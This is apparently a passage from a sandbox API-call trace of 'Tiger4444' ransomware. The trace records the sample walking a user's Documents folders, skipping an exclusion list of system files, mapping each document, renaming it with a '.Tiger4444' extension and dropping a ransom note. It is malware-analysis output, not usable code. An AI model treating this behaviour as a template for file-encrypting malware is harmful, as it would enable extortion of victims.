ftLastWriteTime.dwHighDateTime=0x1d4d5db, nFileSizeHigh=0x0, nFileSizeLow=0xcbed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x7LJ0ZYN8.odt", cAlternateFileName="X7LJ0Z~1.ODT")) returned 1 [0047.224] lstrcmpiW (lpString1="x7LJ0ZYN8.odt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.224] lstrcmpiW (lpString1="x7LJ0ZYN8.odt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.224] lstrcmpiW (lpString1="x7LJ0ZYN8.odt", lpString2="Tiger4444.exe") returned 1 [0047.224] lstrcmpiW (lpString1="x7LJ0ZYN8.odt", lpString2=".") returned 1 [0047.224] lstrcmpiW (lpString1="x7LJ0ZYN8.odt", lpString2="..") returned 1 [0047.224] lstrcmpiW (lpString1="x7LJ0ZYN8.odt", lpString2="windows") returned 1 [0047.224] lstrcmpiW (lpString1="x7LJ0ZYN8.odt", lpString2="bootmgr") returned 1 [0047.224] lstrcmpiW (lpString1="x7LJ0ZYN8.odt", lpString2="pagefile.sys") returned 1 [0047.224] lstrcmpiW (lpString1="x7LJ0ZYN8.odt", lpString2="boot") returned 1 [0047.224] lstrcmpiW (lpString1="x7LJ0ZYN8.odt", lpString2="ids.txt") returned 1 [0047.224] lstrcmpiW (lpString1="x7LJ0ZYN8.odt", lpString2="NTUSER.DAT") returned 1 [0047.224] lstrcpyW (in: lpString1=0x30aeb44, lpString2="x7LJ0ZYN8.odt" | out: lpString1="x7LJ0ZYN8.odt") returned="x7LJ0ZYN8.odt" [0047.224] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h\\x7LJ0ZYN8.odt", dwFileAttributes=0x0) returned 1 [0047.224] lstrlenW (lpString="x7LJ0ZYN8.odt") returned 13 [0047.224] lstrlenW (lpString="Tiger4444") returned 9 [0047.224] lstrcmpiW (lpString1="0ZYN8.odt", lpString2="Tiger4444") returned -1 [0047.224] lstrlenW (lpString=".dll") returned 4 [0047.224] lstrcmpiW (lpString1=".odt", lpString2=".dll") returned 1 [0047.224] lstrlenW (lpString=".lnk") returned 4 [0047.224] lstrcmpiW (lpString1=".odt", lpString2=".lnk") returned 1 [0047.224] lstrlenW (lpString=".ini") returned 4 [0047.224] lstrcmpiW (lpString1=".odt", lpString2=".ini") returned 1 [0047.224] lstrlenW (lpString=".sys") returned 4 [0047.225] lstrcmpiW (lpString1=".odt", lpString2=".sys") returned -1 [0047.225] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h\\x7LJ0ZYN8.odt" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\8igfx4zl3bmpzvf md\\cv 4f8bu8bkzh0h\\x7lj0zyn8.odt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.225] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.225] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13867782570) returned 1 [0047.225] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=52205) returned 1 [0047.225] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0047.225] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d90 [0047.225] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xcef0, lpName=0x0) returned 0x2c8 [0047.225] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xcef0) returned 0xbe0000 [0047.226] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.226] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0047.226] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.226] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0047.226] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.226] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0047.226] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.226] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0047.226] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13867957003) returned 1 [0047.227] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0047.227] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d90 | out: hHeap=0xc50000) returned 1 [0047.227] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.227] CloseHandle (hObject=0x2c8) returned 1 [0047.227] CloseHandle (hObject=0x260) returned 1 [0047.248] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h\\x7LJ0ZYN8.odt.Tiger4444") returned 101 [0047.248] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h\\x7LJ0ZYN8.odt" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\8igfx4zl3bmpzvf md\\cv 4f8bu8bkzh0h\\x7lj0zyn8.odt"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h\\x7LJ0ZYN8.odt.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\8igfx4zl3bmpzvf md\\cv 4f8bu8bkzh0h\\x7lj0zyn8.odt.tiger4444"), dwFlags=0x1) returned 1 [0047.249] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=52208 | out: Addend=0xc6f980) returned 22723216 [0047.249] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4868 [0047.249] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51619ec0, ftCreationTime.dwHighDateTime=0x1d4c598, ftLastAccessTime.dwLowDateTime=0xd1efc0f0, ftLastAccessTime.dwHighDateTime=0x1d4c5ff, ftLastWriteTime.dwLowDateTime=0xd1efc0f0, ftLastWriteTime.dwHighDateTime=0x1d4c5ff, nFileSizeHigh=0x0, nFileSizeLow=0x13953, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yjNibne Et76JLFiG7Cj.rtf", cAlternateFileName="YJNIBN~1.RTF")) returned 1 [0047.249] lstrcmpiW (lpString1="yjNibne Et76JLFiG7Cj.rtf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.249] lstrcmpiW (lpString1="yjNibne Et76JLFiG7Cj.rtf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.249] lstrcmpiW (lpString1="yjNibne Et76JLFiG7Cj.rtf", lpString2="Tiger4444.exe") returned 1 [0047.249] lstrcmpiW (lpString1="yjNibne Et76JLFiG7Cj.rtf", lpString2=".") returned 1 [0047.249] lstrcmpiW (lpString1="yjNibne Et76JLFiG7Cj.rtf", lpString2="..") returned 1 [0047.249] lstrcmpiW (lpString1="yjNibne Et76JLFiG7Cj.rtf", lpString2="windows") returned 1 [0047.249] lstrcmpiW (lpString1="yjNibne Et76JLFiG7Cj.rtf", lpString2="bootmgr") returned 1 [0047.249] lstrcmpiW (lpString1="yjNibne Et76JLFiG7Cj.rtf", lpString2="pagefile.sys") returned 1 [0047.249] lstrcmpiW (lpString1="yjNibne Et76JLFiG7Cj.rtf", lpString2="boot") returned 1 [0047.249] lstrcmpiW (lpString1="yjNibne Et76JLFiG7Cj.rtf", lpString2="ids.txt") returned 1 [0047.250] lstrcmpiW (lpString1="yjNibne Et76JLFiG7Cj.rtf", lpString2="NTUSER.DAT") returned 1 [0047.250] lstrcpyW (in: lpString1=0x30aeb44, lpString2="yjNibne Et76JLFiG7Cj.rtf" | out: lpString1="yjNibne Et76JLFiG7Cj.rtf") returned="yjNibne Et76JLFiG7Cj.rtf" [0047.250] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h\\yjNibne Et76JLFiG7Cj.rtf", dwFileAttributes=0x0) returned 1 [0047.250] lstrlenW (lpString="yjNibne Et76JLFiG7Cj.rtf") returned 24 [0047.250] lstrlenW (lpString="Tiger4444") returned 9 [0047.250] lstrcmpiW (lpString1="iG7Cj.rtf", lpString2="Tiger4444") returned -1 [0047.250] lstrlenW (lpString=".dll") returned 4 [0047.250] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0047.250] lstrlenW (lpString=".lnk") returned 4 [0047.250] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0047.250] lstrlenW (lpString=".ini") returned 4 [0047.250] lstrcmpiW (lpString1=".rtf", lpString2=".ini") returned 1 [0047.250] lstrlenW (lpString=".sys") returned 4 [0047.250] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0047.250] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h\\yjNibne Et76JLFiG7Cj.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\8igfx4zl3bmpzvf md\\cv 4f8bu8bkzh0h\\yjnibne et76jlfig7cj.rtf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.250] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.250] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13870331429) returned 1 [0047.250] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=80211) returned 1 [0047.250] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc896f8 [0047.250] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0047.250] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13c60, lpName=0x0) returned 0x2c8 [0047.250] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13c60) returned 0xbe0000 [0047.252] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.252] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0047.252] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.252] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0047.252] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.252] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0047.252] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.252] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0047.252] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13870560328) returned 1 [0047.253] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc896f8 | out: hHeap=0xc50000) returned 1 [0047.253] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0047.253] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.253] CloseHandle (hObject=0x2c8) returned 1 [0047.253] CloseHandle (hObject=0x260) returned 1 [0047.254] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h\\yjNibne Et76JLFiG7Cj.rtf.Tiger4444") returned 112 [0047.254] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h\\yjNibne Et76JLFiG7Cj.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\8igfx4zl3bmpzvf md\\cv 4f8bu8bkzh0h\\yjnibne et76jlfig7cj.rtf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h\\yjNibne Et76JLFiG7Cj.rtf.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\8igfx4zl3bmpzvf md\\cv 4f8bu8bkzh0h\\yjnibne et76jlfig7cj.rtf.tiger4444"), dwFlags=0x1) returned 1 [0047.254] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=80224 | out: Addend=0xc6f980) returned 22775424 [0047.254] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4869 [0047.254] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51619ec0, ftCreationTime.dwHighDateTime=0x1d4c598, ftLastAccessTime.dwLowDateTime=0xd1efc0f0, ftLastAccessTime.dwHighDateTime=0x1d4c5ff, ftLastWriteTime.dwLowDateTime=0xd1efc0f0, ftLastWriteTime.dwHighDateTime=0x1d4c5ff, nFileSizeHigh=0x0, nFileSizeLow=0x13953, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yjNibne Et76JLFiG7Cj.rtf", cAlternateFileName="YJNIBN~1.RTF")) returned 0 [0047.254] FindClose (in: hFindFile=0xc72e48 | out: hFindFile=0xc72e48) returned 1 [0047.255] lstrcpyW (in: lpString1=0x30aeb44, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0047.255] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\8IgFx4zl3bMpZVF MD\\CV 4F8bU8BkzH0h\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\8igfx4zl3bmpzvf md\\cv 4f8bu8bkzh0h\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0047.255] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0047.255] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0047.256] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.256] CloseHandle (hObject=0x260) returned 1 [0047.256] CloseHandle (hObject=0x2ac) returned 1 [0047.256] GetCurrentThreadId () returned 0xfa8 [0047.256] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66528 [0047.256] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf" [0047.256] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc60fe8 | out: hHeap=0xc50000) returned 1 [0047.256] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66520 | out: hHeap=0xc50000) returned 1 [0047.256] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf" [0047.256] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\" [0047.256] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\.BFC0E91B00AE8A0620D3" [0047.256] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0047.257] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0047.259] FlushFileBuffers (hFile=0x2ac) returned 1 [0047.260] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0047.260] CloseHandle (hObject=0x2ac) returned 1 [0047.261] lstrlenW (lpString="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf") returned 50 [0047.261] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0047.261] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92c64a60, ftCreationTime.dwHighDateTime=0x1d4d212, ftLastAccessTime.dwLowDateTime=0x4954e750, ftLastAccessTime.dwHighDateTime=0x1d4ca5c, ftLastWriteTime.dwLowDateTime=0x812f11a1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72f08 [0047.261] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.261] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.261] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0047.261] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0047.261] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92c64a60, ftCreationTime.dwHighDateTime=0x1d4d212, ftLastAccessTime.dwLowDateTime=0x4954e750, ftLastAccessTime.dwHighDateTime=0x1d4ca5c, ftLastWriteTime.dwLowDateTime=0x812f11a1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.261] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.261] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.261] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0047.261] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0047.261] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0047.262] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x812f11a1, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x812f11a1, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x812f11a1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0047.262] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.262] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0047.262] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xda916690, ftCreationTime.dwHighDateTime=0x1d4cd8a, ftLastAccessTime.dwLowDateTime=0xb05fef0, ftLastAccessTime.dwHighDateTime=0x1d4cff0, ftLastWriteTime.dwLowDateTime=0xb05fef0, ftLastWriteTime.dwHighDateTime=0x1d4cff0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8TIq-qdhatQQU4", cAlternateFileName="8TIQ-Q~1")) returned 1 [0047.262] lstrcmpiW (lpString1="8TIq-qdhatQQU4", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.262] lstrcmpiW (lpString1="8TIq-qdhatQQU4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.262] lstrcmpiW (lpString1="8TIq-qdhatQQU4", lpString2="Tiger4444.exe") returned -1 [0047.262] lstrcmpiW (lpString1="8TIq-qdhatQQU4", lpString2=".") returned 1 [0047.262] lstrcmpiW (lpString1="8TIq-qdhatQQU4", lpString2="..") returned 1 [0047.262] lstrcmpiW (lpString1="8TIq-qdhatQQU4", lpString2="windows") returned -1 [0047.262] lstrcmpiW (lpString1="8TIq-qdhatQQU4", lpString2="bootmgr") returned -1 [0047.262] lstrcmpiW (lpString1="8TIq-qdhatQQU4", lpString2="pagefile.sys") returned -1 [0047.262] lstrcmpiW (lpString1="8TIq-qdhatQQU4", lpString2="boot") returned -1 [0047.262] lstrcmpiW (lpString1="8TIq-qdhatQQU4", lpString2="ids.txt") returned -1 [0047.262] lstrcmpiW (lpString1="8TIq-qdhatQQU4", lpString2="NTUSER.DAT") returned -1 [0047.262] lstrcpyW (in: lpString1=0x30aeb0e, lpString2="8TIq-qdhatQQU4" | out: lpString1="8TIq-qdhatQQU4") returned="8TIq-qdhatQQU4" [0047.262] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc663a0 [0047.262] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x84) returned 0xc79798 [0047.262] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc663a8 | out: ListHead=0xc66828, ListEntry=0xc663a8) returned 0xc66308 [0047.262] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x478f9920, ftCreationTime.dwHighDateTime=0x1d4cb37, ftLastAccessTime.dwLowDateTime=0xfbf1f7b0, ftLastAccessTime.dwHighDateTime=0x1d4cb09, ftLastWriteTime.dwLowDateTime=0xfbf1f7b0, ftLastWriteTime.dwHighDateTime=0x1d4cb09, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FZyK4S", cAlternateFileName="")) returned 1 [0047.262] lstrcmpiW (lpString1="FZyK4S", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.262] lstrcmpiW (lpString1="FZyK4S", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.262] lstrcmpiW (lpString1="FZyK4S", lpString2="Tiger4444.exe") returned -1 [0047.262] lstrcmpiW (lpString1="FZyK4S", lpString2=".") returned 1 [0047.262] lstrcmpiW (lpString1="FZyK4S", lpString2="..") returned 1 [0047.262] lstrcmpiW (lpString1="FZyK4S", lpString2="windows") returned -1 [0047.262] lstrcmpiW (lpString1="FZyK4S", lpString2="bootmgr") returned 1 [0047.262] lstrcmpiW (lpString1="FZyK4S", lpString2="pagefile.sys") returned -1 [0047.262] lstrcmpiW (lpString1="FZyK4S", lpString2="boot") returned 1 [0047.262] lstrcmpiW (lpString1="FZyK4S", lpString2="ids.txt") returned -1 [0047.262] lstrcmpiW (lpString1="FZyK4S", lpString2="NTUSER.DAT") returned -1 [0047.262] lstrcpyW (in: lpString1=0x30aeb0e, lpString2="FZyK4S" | out: lpString1="FZyK4S") returned="FZyK4S" [0047.262] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66440 [0047.262] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x74) returned 0xc83510 [0047.262] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66448 | out: ListHead=0xc66828, ListEntry=0xc66448) returned 0xc663a8 [0047.262] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2898c630, ftCreationTime.dwHighDateTime=0x1d4c840, ftLastAccessTime.dwLowDateTime=0xe69a0420, ftLastAccessTime.dwHighDateTime=0x1d4d545, ftLastWriteTime.dwLowDateTime=0xe69a0420, ftLastWriteTime.dwHighDateTime=0x1d4d545, nFileSizeHigh=0x0, nFileSizeLow=0x1022d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iAgvW_.odp", cAlternateFileName="")) returned 1 [0047.262] lstrcmpiW (lpString1="iAgvW_.odp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.262] lstrcmpiW (lpString1="iAgvW_.odp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.262] lstrcmpiW (lpString1="iAgvW_.odp", lpString2="Tiger4444.exe") returned -1 [0047.262] lstrcmpiW (lpString1="iAgvW_.odp", lpString2=".") returned 1 [0047.263] lstrcmpiW (lpString1="iAgvW_.odp", lpString2="..") returned 1 [0047.263] lstrcmpiW (lpString1="iAgvW_.odp", lpString2="windows") returned -1 [0047.263] lstrcmpiW (lpString1="iAgvW_.odp", lpString2="bootmgr") returned 1 [0047.263] lstrcmpiW (lpString1="iAgvW_.odp", lpString2="pagefile.sys") returned -1 [0047.263] lstrcmpiW (lpString1="iAgvW_.odp", lpString2="boot") returned 1 [0047.263] lstrcmpiW (lpString1="iAgvW_.odp", lpString2="ids.txt") returned -1 [0047.263] lstrcmpiW (lpString1="iAgvW_.odp", lpString2="NTUSER.DAT") returned -1 [0047.263] lstrcpyW (in: lpString1=0x30aeb0e, lpString2="iAgvW_.odp" | out: lpString1="iAgvW_.odp") returned="iAgvW_.odp" [0047.263] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\iAgvW_.odp", dwFileAttributes=0x0) returned 1 [0047.263] lstrlenW 